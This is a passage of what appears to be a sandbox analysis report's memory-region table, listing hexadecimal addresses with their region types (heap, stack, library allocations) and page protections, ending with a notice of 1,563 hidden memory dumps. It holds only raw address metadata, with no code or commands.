page read and write
7FFC12F21000
unkown
page execute read
20561654000
heap
page read and write
216C67C0000
trusted library allocation
page read and write
EEFACFE000
stack
page read and write
7FFC11F8F000
unkown
page read and write
216C67C4000
trusted library allocation
page read and write
205616C6000
heap
page read and write
24AAE8CB000
heap
page read and write
21CA1030000
heap
page read and write
216C6BEA000
heap
page read and write
24AAE748000
heap
page read and write
28338513000
heap
page read and write
24AAE9E0000
heap
page read and write
242AB650000
heap
page read and write
205616F5000
heap
page read and write
BEF19FF000
stack
page read and write
216AF8DE000
trusted library allocation
page read and write
D92FD7B000
stack
page read and write
28338489000
heap
page read and write
24AAE1E6000
heap
page read and write
205617D2000
heap
page read and write
216AC80E000
heap
page read and write
216C69E0000
trusted library allocation
page read and write
24AAE074000
heap
page read and write
216AF892000
trusted library allocation
page read and write
7FFBABA70000
trusted library allocation
page read and write
24AAE7FC000
heap
page read and write
216BE792000
trusted library allocation
page read and write
216ACAC5000
heap
page read and write
7FFC1208D000
unkown
page readonly
D5AFEFB000
stack
page read and write
7FF6A42B1000
unkown
page execute read
216AC6A0000
heap
page read and write
1D34BE13000
heap
page read and write
242AB77E000
heap
page read and write
21CA1460000
heap
page execute and read and write
2833843C000
heap
page read and write
216AF680000
trusted library allocation
page read and write
7FFC0F839000
unkown
page execute read
24AAE9F3000
heap
page read and write
2055F260000
heap
page read and write
24AAE9CB000
heap
page read and write
24AAE768000
heap
page read and write
216C688E000
heap
page read and write
2055F9B5000
heap
page read and write
216C6890000
heap
page read and write
216B0262000
trusted library allocation
page read and write
21C9F774000
heap
page read and write
216AE5C0000
heap
page read and write
2B1B7C76000
heap
page read and write
7FFC12E6E000
unkown
page readonly
21C9F6C0000
heap
page readonly
216AF330000
trusted library allocation
page read and write
242AB5C6000
heap
page read and write
20561860000
direct allocation
page read and write
7FFC13004000
unkown
page readonly
20561653000
heap
page read and write
2055F3E0000
direct allocation
page read and write
7FFBABC10000
trusted library allocation
page read and write
7FFC11F91000
unkown
page readonly
216AF668000
trusted library allocation
page read and write
24AAE831000
heap
page read and write
24AAE9E3000
heap
page read and write
22288D02000
heap
page read and write
7FF6A42DF000
unkown
page read and write
24AAE075000
heap
page read and write
24AAE9EF000
heap
page read and write
7FFBABC57000
trusted library allocation
page read and write
7FFBABBE0000
trusted library allocation
page read and write
7FFC12E91000
unkown
page execute read
2055F3A0000
direct allocation
page read and write
77E3A3F000
stack
page read and write
7FFC1ED94000
unkown
page read and write
2B1B7BC0000
heap
page read and write
7FFBABBC0000
trusted library allocation
page read and write
2056170A000
heap
page read and write
28338E00000
heap
page read and write
24AAE7B4000
heap
page read and write
24AAE9B5000
heap
page read and write
7FFBABD30000
trusted library allocation
page read and write
216C681D000
heap
page read and write
28338200000
heap
page read and write
1D34BD70000
heap
page read and write
22288C5A000
heap
page read and write
216C68C2000
heap
page read and write
28338486000
heap
page read and write
2055F2ED000
heap
page read and write
7FFBABA7C000
trusted library allocation
page execute and read and write
24AAE884000
heap
page read and write
24AAE8C8000
heap
page read and write
22658200000
heap
page read and write
216AF8C6000
trusted library allocation
page read and write
7FFBABCF0000
trusted library allocation
page read and write
21CA2182000
trusted library allocation
page read and write
242AB671000
heap
page read and write
24AAE069000
heap
page read and write
21CA2213000
trusted library allocation
page read and write
7FFBABC80000
trusted library allocation
page read and write
24AAE9F3000
heap
page read and write
24AAE8CB000
heap
page read and write
24AAE8EF000
heap
page read and write
D5AF2FE000
stack
page read and write
216AC7BB000
heap
page read and write
216AC79F000
heap
page read and write
BEF18FE000
stack
page read and write
7FFBABAA6000
trusted library allocation
page execute and read and write
283385B9000
heap
page read and write
EEFA9FD000
stack
page read and write
216C6889000
heap
page read and write
7FFC12F44000
unkown
page readonly
28338400000
heap
page read and write
24AAE083000
heap
page read and write
7FFBABCB0000
trusted library allocation
page read and write
24AAE9CD000
heap
page read and write
24AAE9DE000
heap
page read and write
7FF6A42E1000
unkown
page read and write
7FFC0FF09000
unkown
page read and write
24AAE8EF000
heap
page read and write
216AF79E000
trusted library allocation
page read and write
205617D2000
heap
page read and write
20BEEAF0000
heap
page read and write
28F30629000
heap
page read and write
226581E0000
remote allocation
page read and write
2833845B000
heap
page read and write
21CA302A000
trusted library allocation
page read and write
22658010000
heap
page read and write
24AAE0A8000
heap
page read and write
216C6865000
heap
page read and write
24AAE9CB000
heap
page read and write
7FFBAB984000
trusted library allocation
page read and write
24AAE8B1000
heap
page read and write
216C689F000
heap
page read and write
24AAE99B000
heap
page read and write
24AAE9D1000
heap
page read and write
216B03C1000
trusted library allocation
page read and write
F202BFE000
stack
page read and write
216AE939000
trusted library allocation
page read and write
2B1A44E000
stack
page read and write
24AAE075000
heap
page read and write
216AC846000
heap
page read and write
216B01DA000
trusted library allocation
page read and write
7FFC21E14000
unkown
page readonly
28338E30000
heap
page read and write
24AAE0A8000
heap
page read and write
24AAE9EF000
heap
page read and write
24AAE9CD000
heap
page read and write
8FDEFFF000
stack
page read and write
22288C75000
heap
page read and write
20561736000
heap
page read and write
2B1B7C4E000
heap
page read and write
2056164F000
heap
page read and write
7FFC0FE4B000
unkown
page readonly
216C67D7000
heap
page execute and read and write
24AAE8D5000
heap
page read and write
216AE530000
trusted library allocation
page read and write
2055F985000
heap
page read and write
24AAE9CD000
heap
page read and write
20BEEC02000
heap
page read and write
216AF82D000
trusted library allocation
page read and write
21CB9679000
heap
page read and write
24AAE1E6000
heap
page read and write
7FFC13003000
unkown
page read and write
216BE75A000
trusted library allocation
page read and write
7FF6A42EF000
unkown
page readonly
24AAE832000
heap
page read and write
21CB9B90000
heap
page read and write
216C68AF000
heap
page read and write
24AAE9C3000
heap
page read and write
22657FA0000
heap
page read and write
24AAE07F000
heap
page read and write
7FFC11E61000
unkown
page execute read
205617B6000
heap
page read and write
24AAE8EF000
heap
page read and write
205617C2000
heap
page read and write
21CA304D000
trusted library allocation
page read and write
24AAE96C000
heap
page read and write
7FFC0FA07000
unkown
page readonly
21C9F640000
heap
page read and write
24AAE8EF000
heap
page read and write
22658300000
heap
page read and write
7FFC12F20000
unkown
page readonly
21CB97F0000
trusted library allocation
page read and write
2055F9A3000
heap
page read and write
7FFBABB62000
trusted library allocation
page read and write
216AC710000
heap
page read and write
7FFC12E83000
unkown
page readonly
24AAE0A8000
heap
page read and write
216C6B40000
remote allocation
page read and write
20561779000
heap
page read and write
2055F2FB000
heap
page read and write
7FFC0FAFD000
unkown
page readonly
24AAE030000
heap
page read and write
7FFBABBB0000
trusted library allocation
page read and write
216C6858000
heap
page read and write
7FFC23C56000
unkown
page readonly
24AAE09A000
heap
page read and write
22288B70000
heap
page read and write
242AB560000
heap
page read and write
24AAE720000
heap
page read and write
21C9F777000
heap
page read and write
2265822A000
heap
page read and write
2055F2ED000
heap
page read and write
77E48CF000
stack
page read and write
226581A0000
trusted library allocation
page read and write
24AAE271000
heap
page read and write
216C683D000
heap
page read and write
7FFBABCD0000
trusted library allocation
page read and write
D92FBFE000
stack
page read and write
242AD1C0000
trusted library allocation
page read and write
216C67C0000
trusted library allocation
page read and write
21CA1689000
trusted library allocation
page read and write
7FF79BF4F000
unkown
page read and write
24AAE957000
heap
page read and write
24AAE8F2000
heap
page read and write
21CA1470000
heap
page read and write
28338E13000
heap
page read and write
22658313000
heap
page read and write
7FFC13028000
unkown
page read and write
7FFC12F03000
unkown
page readonly
24AAE83A000
heap
page read and write
24AAE074000
heap
page read and write
7FFC11E80000
unkown
page readonly
7FF6A42D0000
unkown
page readonly
7FFBABAE0000
trusted library allocation
page execute and read and write
24AAE9DE000
heap
page read and write
2DF6D293000
heap
page read and write
7FFC0FA05000
unkown
page execute read
7FFBABD00000
trusted library allocation
page read and write
24AAE063000
heap
page read and write
2B1B7B60000
heap
page read and write
77E33F5000
stack
page read and write
7FFC0FE41000
unkown
page readonly
7FFBABCF0000
trusted library allocation
page read and write
20BEEC13000
heap
page read and write
216AF72A000
trusted library allocation
page read and write
21CB97F0000
trusted library allocation
page read and write
242AD0A4000
trusted library allocation
page read and write
20BEED02000
heap
page read and write
24AAE072000
heap
page read and write
7FFBABCE0000
trusted library allocation
page read and write
216AC79B000
heap
page read and write
24AAE08A000
heap
page read and write
28F30702000
heap
page read and write
24AAE9C3000
heap
page read and write
216AF7BF000
trusted library allocation
page read and write
20561A10000
direct allocation
page read and write
7FFC12EC5000
unkown
page readonly
24AAE962000
heap
page read and write
2833846C000
heap
page read and write
2DF6EE30000
heap
page read and write
D5AF0F7000
stack
page read and write
21CA0FC3000
trusted library allocation
page read and write
24AAE8F0000
heap
page read and write
7FFBABBF0000
trusted library allocation
page read and write
BEF1CFC000
stack
page read and write
24AAE96A000
heap
page read and write
7FF79BBC1000
unkown
page execute read
24AAE920000
heap
page read and write
7FFBABBA0000
trusted library allocation
page read and write
7FFBABA80000
trusted library allocation
page execute and read and write
7FFBABC60000
trusted library allocation
page read and write
21CA322C000
trusted library allocation
page read and write
216C6BB7000
heap
page read and write
24AAE07F000
heap
page read and write
24AAE9CF000
heap
page read and write
2B1B7C48000
heap
page read and write
7FF6A42E3000
unkown
page read and write
24AAE27B000
heap
page read and write
242AB679000
heap
page read and write
1D34BE68000
heap
page read and write
24AAE8FC000
heap
page read and write
216B03CE000
trusted library allocation
page read and write
28338413000
heap
page read and write
EEFA8FE000
stack
page read and write
216AF7A7000
trusted library allocation
page read and write
21C9F690000
trusted library allocation
page read and write
EEFA77F000
stack
page read and write
21CA21F7000
trusted library allocation
page read and write
7FFC120CE000
unkown
page read and write
20561A90000
direct allocation
page read and write
2DF6D30E000
heap
page read and write
7FFC0F7C0000
unkown
page readonly
216C68AF000
heap
page read and write
1D34BF02000
heap
page read and write
24AAE75E000
heap
page read and write
216AF724000
trusted library allocation
page read and write
7FFC12E9B000
unkown
page readonly
24AAE07F000
heap
page read and write
24AAE74B000
heap
page read and write
216AF71B000
trusted library allocation
page read and write
77E397E000
stack
page read and write
21CB96B0000
trusted library allocation
page read and write
D92F67E000
stack
page read and write
21CB9810000
trusted library allocation
page read and write
242AB650000
heap
page read and write
7FFBABC20000
trusted library allocation
page read and write
2B1B7C57000
heap
page read and write
7FFC12F40000
unkown
page readonly
216AF85E000
trusted library allocation
page read and write
24AAE9C5000
heap
page read and write
7FFC12EE0000
unkown
page readonly
BEF1A7E000
stack
page read and write
24AAE93F000
heap
page read and write
20561A50000
direct allocation
page read and write
24AAE9D1000
heap
page read and write
24AAE272000
heap
page read and write
7FF79BF4F000
unkown
page write copy
24AAE1CE000
heap
page read and write
1D34BDA0000
trusted library allocation
page read and write
21C9F645000
heap
page read and write
2055F2DC000
heap
page read and write
2B1B7C02000
heap
page read and write
2DF6D2F6000
heap
page read and write
24AAE0A8000
heap
page read and write
21CB98A8000
heap
page read and write
2056171A000
heap
page read and write
28F30643000
heap
page read and write
2833845D000
heap
page read and write
EEFAB7D000
stack
page read and write
24AAE7D2000
heap
page read and write
28F30F39000
heap
page read and write
216AF2A9000
trusted library allocation
page read and write
21CB9850000
heap
page read and write
24AAE019000
heap
page read and write
2055F9B5000
heap
page read and write
23F97D60000
heap
page read and write
216C69F0000
trusted library allocation
page read and write
216C68C2000
heap
page read and write
7FFC12FF1000
unkown
page execute read
24AAE075000
heap
page read and write
7FFBABBF0000
trusted library allocation
page read and write
7FFC0FDE4000
unkown
page readonly
216C6B40000
remote allocation
page read and write
24AAE909000
heap
page read and write
24AAE9F3000
heap
page read and write
20561781000
heap
page read and write
20561570000
direct allocation
page read and write
BEF1EFD000
stack
page read and write
24AAE9F3000
heap
page read and write
7FFC21E10000
unkown
page readonly
24AAE8EF000
heap
page read and write
21CB14E2000
trusted library allocation
page read and write
216C67E0000
heap
page read and write
2833848F000
heap
page read and write
2B1B7C7D000
heap
page read and write
7FFC12E90000
unkown
page readonly
216C68CF000
heap
page read and write
24AAD810000
trusted library allocation
page read and write
7FFC1EC83000
unkown
page readonly
7FFC0F7CD000
unkown
page execute read
21CA3021000
trusted library allocation
page read and write
24AAE069000
heap
page read and write
22658213000
heap
page read and write
24AAE914000
heap
page read and write
D92F3B7000
stack
page read and write
28F306C6000
heap
page read and write
28338390000
trusted library allocation
page read and write
21CA1447000
heap
page execute and read and write
20BEEC54000
heap
page read and write
216AF894000
trusted library allocation
page read and write
2055F464000
heap
page read and write
EEFA2BB000
stack
page read and write
20561C90000
heap
page read and write
21CA2C49000
trusted library allocation
page read and write
216C6BE8000
heap
page read and write
7FFC11F32000
unkown
page readonly
28338457000
heap
page read and write
21CB959D000
heap
page read and write
24AAE8F5000
heap
page read and write
24AAE07F000
heap
page read and write
7FFC0FB10000
unkown
page readonly
24AAE9B5000
heap
page read and write
242AB4D0000
heap
page read and write
77E367F000
stack
page read and write
24AAE8EF000
heap
page read and write
205617C7000
heap
page read and write
2055F830000
direct allocation
page read and write
24AAE8C8000
heap
page read and write
24AAE0A7000
heap
page read and write
28338DB0000
heap
page read and write
28F30F00000
heap
page read and write
216C68AF000
heap
page read and write
8EB97BB000
stack
page read and write
7FFC12FE0000
unkown
page readonly
24AAE06B000
heap
page read and write
24AAE074000
heap
page read and write
23F97E41000
heap
page read and write
2055F8F0000
heap
page read and write
7FFBABD20000
trusted library allocation
page read and write
20562120000
direct allocation
page read and write
28338D02000
heap
page read and write
8EBA1FF000
stack
page read and write
7FFC1206C000
unkown
page readonly
2056165E000
heap
page read and write
2055F32E000
heap
page read and write
216C686E000
heap
page read and write
216C67C0000
trusted library allocation
page read and write
2055F7F0000
direct allocation
page read and write
7FFC12E61000
unkown
page readonly
7FFBABD40000
trusted library allocation
page read and write
216AE720000
heap
page execute and read and write
20BEEC3E000
heap
page read and write
21CB95EB000
heap
page read and write
216C6853000
heap
page read and write
24AAE95F000
heap
page read and write
7FFC12F15000
unkown
page readonly
216C68AD000
heap
page read and write
2B1B8402000
trusted library allocation
page read and write
22659C02000
trusted library allocation
page read and write
D930A8E000
stack
page read and write
216AF8E1000
trusted library allocation
page read and write
2833846A000
heap
page read and write
FA083FE000
stack
page read and write
2B1B7C79000
heap
page read and write
7FFC12F42000
unkown
page readonly
24AAE7D2000
heap
page read and write
24AAE20E000
heap
page read and write
7FFC11E60000
unkown
page readonly
7FF6A42EF000
unkown
page readonly
216AF5F7000
trusted library allocation
page read and write
2B19159000
stack
page read and write
2055F272000
heap
page read and write
20BEEC46000
heap
page read and write
77E478F000
stack
page read and write
22288C57000
heap
page read and write
24AAE8EF000
heap
page read and write
21CB9638000
heap
page read and write
216B0174000
trusted library allocation
page read and write
216AF727000
trusted library allocation
page read and write
1D34BE02000
heap
page read and write
24AAE8EF000
heap
page read and write
2DF6D4F4000
heap
page read and write
21CB1481000
trusted library allocation
page read and write
24AAE9C3000
heap
page read and write
7FFC1209E000
unkown
page write copy
21CB96A4000
trusted library allocation
page read and write
24AAE962000
heap
page read and write
7FFBABC17000
trusted library allocation
page read and write
205619D0000
direct allocation
page read and write
2055F230000
heap
page read and write
28338D54000
heap
page read and write
7FFBABC50000
trusted library allocation
page read and write
300B0FC000
stack
page read and write
2B1B7C42000
heap
page read and write
7FFC1ED95000
unkown
page readonly
242AB880000
trusted library allocation
page read and write
24AAE9C5000
heap
page read and write
242AB679000
heap
page read and write
216AF677000
trusted library allocation
page read and write
24AAE0A8000
heap
page read and write
28338D90000
heap
page read and write
2055F2B9000
heap
page read and write
7FFC12EA0000
unkown
page readonly
24AAE9EF000
heap
page read and write
7FFC0F79D000
unkown
page read and write
24AAE8CB000
heap
page read and write
216C68B2000
heap
page read and write
24AAE9D1000
heap
page read and write
216C67D0000
heap
page execute and read and write
7FFC0FA32000
unkown
page readonly
216AF32C000
trusted library allocation
page read and write
2055F2F9000
heap
page read and write
24AAE75C000
heap
page read and write
21CB968C000
heap
page read and write
28338D43000
heap
page read and write
216BE8D4000
trusted library allocation
page read and write
21CA14E2000
trusted library allocation
page read and write
216C6848000
heap
page read and write
2056164D000
heap
page read and write
216C6B93000
heap
page read and write
7FFBABA30000
trusted library allocation
page read and write
24AAE086000
heap
page read and write
24AAE074000
heap
page read and write
216AE1B5000
heap
page read and write
8EBA17E000
stack
page read and write
20561C00000
direct allocation
page read and write
7FFBABB80000
trusted library allocation
page read and write
23F97E29000
heap
page read and write
216AC84F000
heap
page read and write
7FFC11FD0000
unkown
page readonly
7FFBAB9D3000
trusted library allocation
page read and write
216AC81B000
heap
page read and write
9ACD7FB000
stack
page read and write
7FFC12F16000
unkown
page read and write
24AAE754000
heap
page read and write
24AAE9DF000
heap
page read and write
7FFC12F24000
unkown
page readonly
24AAE7B7000
heap
page read and write
23F97F02000
heap
page read and write
24AAE8C8000
heap
page read and write
2055FB60000
direct allocation
page read and write
24AAE9BB000
heap
page read and write
2B1B7C32000
heap
page read and write
2B1B7C5A000
heap
page read and write
28338370000
trusted library allocation
page read and write
7FFBABC00000
trusted library allocation
page read and write
D92F7FE000
stack
page read and write
28F30E02000
heap
page read and write
21C9F6B0000
trusted library allocation
page read and write
20562230000
direct allocation
page read and write
7FFC12EF5000
unkown
page readonly
7FFC11FB0000
unkown
page readonly
7FFC0FAF9000
unkown
page readonly
216C67C3000
trusted library allocation
page read and write
28F30600000
heap
page read and write
21C9F73C000
heap
page read and write
216AF706000
trusted library allocation
page read and write
24AAE90B000
heap
page read and write
24AAE07F000
heap
page read and write
22658240000
heap
page read and write
1D34BD00000
heap
page read and write
24AAE8C8000
heap
page read and write
24AAE074000
heap
page read and write
D92FDFB000
stack
page read and write
2055F300000
heap
page read and write
28F306BF000
heap
page read and write
24AAE9DE000
heap
page read and write
24AAE9CB000
heap
page read and write
1D34BE3C000
heap
page read and write
21C9F72B000
heap
page read and write
7FFC11FB1000
unkown
page execute read
20BEEA90000
heap
page read and write
24AAE9F3000
heap
page read and write
7FFBABC90000
trusted library allocation
page read and write
24AAE018000
heap
page read and write
7FFC12067000
unkown
page write copy
216AE0E0000
heap
page read and write
D92FCFE000
stack
page read and write
216AF8D8000
trusted library allocation
page read and write
7FFC1ED80000
unkown
page readonly
24AAE831000
heap
page read and write
21C9F650000
heap
page read and write
21CA2190000
trusted library allocation
page read and write
216C686A000
heap
page read and write
24AAD684000
heap
page read and write
24AAE0A8000
heap
page read and write
7FFC12080000
unkown
page readonly
21CB98D6000
heap
page read and write
216AF8E4000
trusted library allocation
page read and write
28F306CE000
heap
page read and write
24AAE9EA000
heap
page read and write
216ACAC0000
heap
page read and write
2B1B7C3D000
heap
page read and write
22288C02000
heap
page read and write
FA082FC000
stack
page read and write
7FFBAB9CD000
trusted library allocation
page execute and read and write
28F3066E000
heap
page read and write
2B1B7C56000
heap
page read and write
7FFC0F84A000
unkown
page execute read
22658160000
trusted library allocation
page read and write
21CA3234000
trusted library allocation
page read and write
7FFBABB34000
trusted library allocation
page read and write
7FFC12F00000
unkown
page readonly
20561716000
heap
page read and write
BEF1BFC000
stack
page read and write
2265824B000
heap
page read and write
24AAE761000
heap
page read and write
24AAE9C9000
heap
page read and write
7FFBABBE0000
trusted library allocation
page read and write
216C6819000
heap
page read and write
21CB9590000
heap
page read and write
28338D22000
heap
page read and write
D930A0C000
stack
page read and write
216C67A0000
trusted library allocation
page read and write
24AAE9D1000
heap
page read and write
205616C7000
heap
page read and write
242AB638000
heap
page read and write
24AAE75C000
heap
page read and write
20561990000
direct allocation
page read and write
20561751000
heap
page read and write
7FFBABC70000
trusted library allocation
page read and write
24AAE08A000
heap
page read and write
7FFC12F01000
unkown
page execute read
7FFC12F31000
unkown
page execute read
24AAE9DE000
heap
page read and write
7FFC0FAD6000
unkown
page read and write
7FFC12044000
unkown
page readonly
7FFC120C0000
unkown
page readonly
2B1B7C6A000
heap
page read and write
7FFBAB980000
trusted library allocation
page read and write
28F30664000
heap
page read and write
2B1B7D02000
heap
page read and write
7FFC12E43000
unkown
page readonly
216AC85C000
heap
page read and write
216C6B91000
heap
page read and write
216B01AE000
trusted library allocation
page read and write
22288D13000
heap
page read and write
24AAE9C9000
heap
page read and write
24AAE9B5000
heap
page read and write
24AAE8CB000
heap
page read and write
7FFC0FADD000
unkown
page readonly
2B1B7C13000
heap
page read and write
BCF057E000
stack
page read and write
2DF6D2C9000
heap
page read and write
7FFBAB990000
trusted library allocation
page read and write
23F97E13000
heap
page read and write
24AAE199000
heap
page read and write
23F97D50000
heap
page read and write
22658249000
heap
page read and write
7FFBABBC0000
trusted library allocation
page read and write
21C9F73A000
heap
page read and write
24AAE901000
heap
page read and write
20BEEC29000
heap
page read and write
2DF6D280000
heap
page read and write
7FFC1302C000
unkown
page readonly
24AAE8F4000
heap
page read and write
24AAE9F3000
heap
page read and write
21CA2236000
trusted library allocation
page read and write
24AAE243000
heap
page read and write
300B87C000
stack
page read and write
24AAE08B000
heap
page read and write
2B19ADE000
stack
page read and write
216AF881000
trusted library allocation
page read and write
1D34BF13000
heap
page read and write
21CB96A1000
trusted library allocation
page read and write
7FFC12F41000
unkown
page execute read
24AAE96A000
heap
page read and write
24AAE9E4000
heap
page read and write
7FFBABC60000
trusted library allocation
page read and write
216AF712000
trusted library allocation
page read and write
7FFC0F640000
unkown
page readonly
24AAE020000
heap
page read and write
24AAE07F000
heap
page read and write
21CB9671000
heap
page read and write
22288C00000
heap
page read and write
21CB97C0000
trusted library allocation
page read and write
2055F32F000
heap
page read and write
21CA2FE8000
trusted library allocation
page read and write
8FDEBFF000
stack
page read and write
242AB64D000
heap
page read and write
2B1B7C73000
heap
page read and write
24AAE858000
heap
page read and write
216C67C0000
trusted library allocation
page read and write
24AAE23D000
heap
page read and write
D92F3FF000
stack
page read and write
28338443000
heap
page read and write
7FFBABCE0000
trusted library allocation
page read and write
8EB9DFC000
stack
page read and write
7FF6A42DC000
unkown
page read and write
There are 1563 hidden memdumps, click here to show them.